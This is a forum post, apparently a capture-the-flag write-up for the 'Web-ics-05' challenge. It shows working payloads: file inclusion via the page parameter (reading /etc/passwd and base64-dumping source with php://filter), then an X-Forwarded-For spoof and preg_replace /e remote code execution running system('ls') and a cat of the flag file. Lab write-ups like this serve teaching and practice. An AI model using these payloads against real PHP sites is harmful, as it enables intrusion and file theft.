Jump to content

  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

攻防世界 | Web-ics-05

 Share
HACK1949

By HACK1949,
in ios/Android development

Recommended Posts

HACK1949 Grand Master

HACK1949

Posted
Posted

题目描述

其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

打开题目

先进来随便点点看看有什么功能

2933891-20220814121237949-914057054.png

 

除了“设备维护中心”,其他都没反应,对应了题目,那么应该在这里做文章了

路径是这个:http://61.147.171.105:50657/index.php

御剑扫了一下后台没扫出来什么有利用价值的东西

右键查看一下源代码

2933891-20220814121249569-818107725.png

 

 

二话不说,访问就对了

有回显

2933891-20220814121302113-1179519164.png

 

猜测可能是文件包含

看到page,联想到这题可能是文件包含,试一下index改成 /etc/passswd

八九不离十了

2933891-20220814121324565-609132671.png

 

利用php伪协议

?page=php://filter/read=convert.base64-encode/resource=index.php 

2933891-20220814121346209-851094022.png

 

获得源码

解密一下

 

<?php
  error_reporting(0);
@session_start();
posix_setuid(1000);
?>
  <!DOCTYPE HTML>
  <html>
  
  <head>
  <meta charset="utf-8">
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="layui/css/layui.css" media="all">
  <title>设备维护中心</title>
  <meta charset="utf-8">
  </head>
  
  <body>
  <ul class="layui-nav">
  <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
  </ul>
  <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
  <legend>设备列表</legend>
  </fieldset>
  <table class="layui-hide" id="test"></table>
  <script type="text/html" id="switchTpl">
  <!-- 这里的 checked 的状态只是演示 -->
  <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
  </script>
  <script src="layui/layui.js" charset="utf-8"></script>
  <script>
  layui.use('table', function() {
    var table = layui.table,
    form = layui.form;
    
    table.render({
      elem: '#test',
      url: '/somrthing.json',
      cellMinWidth: 80,
      cols: [
        [
          { type: 'numbers' },
          { type: 'checkbox' },
          { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
          { field: 'name', title: '设备名', templet: '#nameTpl' },
          { field: 'area', title: '区域' },
          { field: 'status', title: '维护状态', minWidth: 120, sort: true },
          { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
        ]
      ],
      page: true
      });
  });
</script>
  <script>
  layui.use('element', function() {
    var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
    //监听导航点击
    element.on('nav(demo)', function(elem) {
      //console.log(elem)
      layer.msg(elem.text());
    });
  });
</script>
  
  <?php
  
  $page = $_GET[page];

if (isset($page)) {
  if (ctype_alnum($page)) {
    ?>
      <br /><br /><br /><br />
      <div style="text-align:center">
      <p class="lead"><?php echo $page; die();?></p>
        <br /><br /><br /><br />
        
        <?php
        
    }else{
    
    ?>
      <br /><br /><br /><br />
      <div style="text-align:center">
      <p class="lead">
      <?php
      
      if (strpos($page, 'input') > 0) {
        die();
      }
    
    if (strpos($page, 'ta:text') > 0) {
      die();
    }
    
    if (strpos($page, 'text') > 0) {
      die();
    }
    
    if ($page === 'index.php') {
      die('Ok');
    }
    include($page);
    die();
    ?>
      </p>
      <br /><br /><br /><br />
      
      <?php
    }}

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
  
  echo "<br >Welcome My Admin ! <br >";
  
  $pattern = $_GET[pat];
  $replacement = $_GET[rep];
  $subject = $_GET[sub];
  
  if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
  }else{
    die();
  }
}
?>
  </body>
  </html>

 

代码审计

有用的其实也就在最后这点

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
  
  echo "<br >Welcome My Admin ! <br >";
  
  $pattern = $_GET[pat];
  $replacement = $_GET[rep];
  $subject = $_GET[sub];
  
  if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
  }else{
    die();
  }
}
?>

 

需要在请求包里加上一串这个X-Forwarded-For: 127.0.0.1

接着药注意preg_replace这个函数,这是RCE常见的一个函数

preg_replace($pattern, $replacement, $subject)函数会将subject中匹配pattern的部分用replacement替换,如果启用/e参数的话,就会将replacement当做php代码执行。

RCE

/index.php?pat=//e&rep=system('ls')&sub=1

2933891-20220814121459403-16995943.png

到这就解出来了

把右边可疑的一个一个ls一下

最后找到flag.php

最终答案

?pat=//e&rep=system('cat%20s3chahahaDir/flag/flag.php')&sub=1

2933891-20220814121523841-1454796422.png

Link to post
Link to comment
Share on other sites
 Share
Go to topic listing

discussion group

discussion group

  
    You don't have permission to chat.

    • Recently Browsing   0 members

      • No registered users viewing this page.

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • Create New...